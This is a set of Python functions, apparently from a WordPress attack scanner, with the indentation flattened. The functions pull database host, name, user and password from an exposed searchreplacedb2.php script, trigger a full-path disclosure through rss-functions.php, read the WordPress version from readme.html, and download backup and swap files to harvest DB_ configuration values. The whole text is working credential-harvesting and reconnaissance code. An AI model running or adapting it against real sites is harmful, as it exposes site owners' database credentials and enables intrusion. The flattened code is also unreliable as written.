def passive(target): url = target.url url += "searchreplacedb2.php" c = Convention() html = "" retvalue = [] found,html = Core.get_web_page(url,search="<title>Search and replace DB.</title>") if found: log.success('Search&Replace is at \x1B[31m'+url+"\x1B[0m") url += "?step=2" values = {'loadwp':1} found,html = Core.get_web_page(url,values=values) if found: html = html.split('\n') for line in html: if line.find('name="host"') != -1: retvalue.append((c.DB_Host,line.split('"')[9])) if line.find('name="data"') != -1: retvalue.append((c.DB_Name,line.split('"')[9])) if line.find('name="user"') != -1: retvalue.append((c.DB_User,line.split('"')[9])) if line.find('name="pass"') != -1: retvalue.append((c.DB_Password,line.split('"')[9])) retvalue.append((c.sdb2,"True")) return retvalue
def passive(target): url = target.url c = Convention() retValue = [] url += "/wp-includes/rss-functions.php" html = "" found,html = Core.get_web_page(url) if found: log.info('[RSS Full Path] May have found Full Path Disclosure') html = html.split('\n') for line in html: if line.find('() in <b>') != -1: beg = line.find('() in <b>')+9 end = line.find("wp-includes") retValue.append((c.Full_Path,line[beg:end])) if len(retValue) == 0: retValue = [('none',False)] return retValue
def passive(target): url = target.url c = Convention() url+="readme.html" version = False html = "" found,html = Core.get_web_page(url,search='<br /> Version') if found: html = html.split('\n') for line in html: p = line.find('<br /> Version') if p != -1: versionLine = line.split('\x20') version = versionLine[len(versionLine)-1] if not version: log.failure("[Version] Wasn't able to read "+url) else: return [(c.WP_Version,version)] return []
def request_worker(url): global swap_found status,content = Core.get_web_page(url) if status: if len(content) > 0: directory = os.getcwd()+"/output" if not os.path.exists(directory): os.makedirs(directory) file_name = url.replace('/','_') log.success("[Swap] Found backup or swap and saving it as \x1B[92m"+directory+'/'+file_name+"\x1B[0m") f = open(directory+'/'+file_name,'w') f.write(content) f.close() if "DB_" in content: parsed = Core.parse_config_file(content) for item in parsed: swap_found.append(item)
def hostUp(self): status,home = Core.get_web_page(self.target.url) return status